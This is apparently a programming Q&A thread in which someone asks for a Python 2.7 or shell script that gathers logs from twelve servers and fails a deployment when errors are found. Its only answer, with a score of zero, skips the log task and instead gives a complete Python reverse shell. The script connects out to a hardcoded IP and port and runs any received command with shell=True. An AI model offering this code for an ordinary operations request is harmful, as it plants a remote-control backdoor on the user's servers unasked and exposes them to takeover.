# Python/shell Script(Prefer Python) for Collection Events Logs from multiple servers and generating a single file and search for errors

Tags: python, python-2.7, shell, scripting, sh

My client wanted to collect multiple application logs from multiple servers and have on file that should search for errors. If we find errors we need to end the deployment workflow.

Prefer Python(2.7) but shell script is also fine.

Comment: How will you transmit the log files from the various servers?  Probably something on those servers needs to be set up to allow you to retrieve them or optionally push them to some common location.

Comment: My main goal here is to find the errors in the logs of a application in all 12 servers. If there are no error than my script should pass if not it should fail

Comment: sure, but how will you access the logs?

Comment: We haven't decided yet. But mostly they are password less servers. No need of authentication.

Comment: password-less servers?  Sounds like asking for trouble!

Answer (score 0):

you want to create a shell with python ?

try this , but the client need to listen to the Port of the Shell

```
#!/usr/bin/python 


import subprocess, socket 


HOST = '192.168.1.1' #Your Ip Addres

PORT = 4444 # the Port Of The Shell , The Client Need to Listen to This Portfor Get An Acces to CMD from the Server , its an SSH Shell  


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

s.connect((HOST, PORT)) # Connecting to The Host

s.send('Shell Session Succesfull Connected Press Enter To Start ReverseHandling')  # the Message to Send When the User Opened The Shell 


while 1: 

  data = s.recv(1024) 

  if data == "quit": break 

  send = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 

  stdoutput = send.stdout.read() + send.stderr.read() 

  s.send(stdoutput) 

# When The Loop Are Exited

s.send('Shell Session Closed') #This Message Will be Sended When The Shell Are Closed

s.close()
```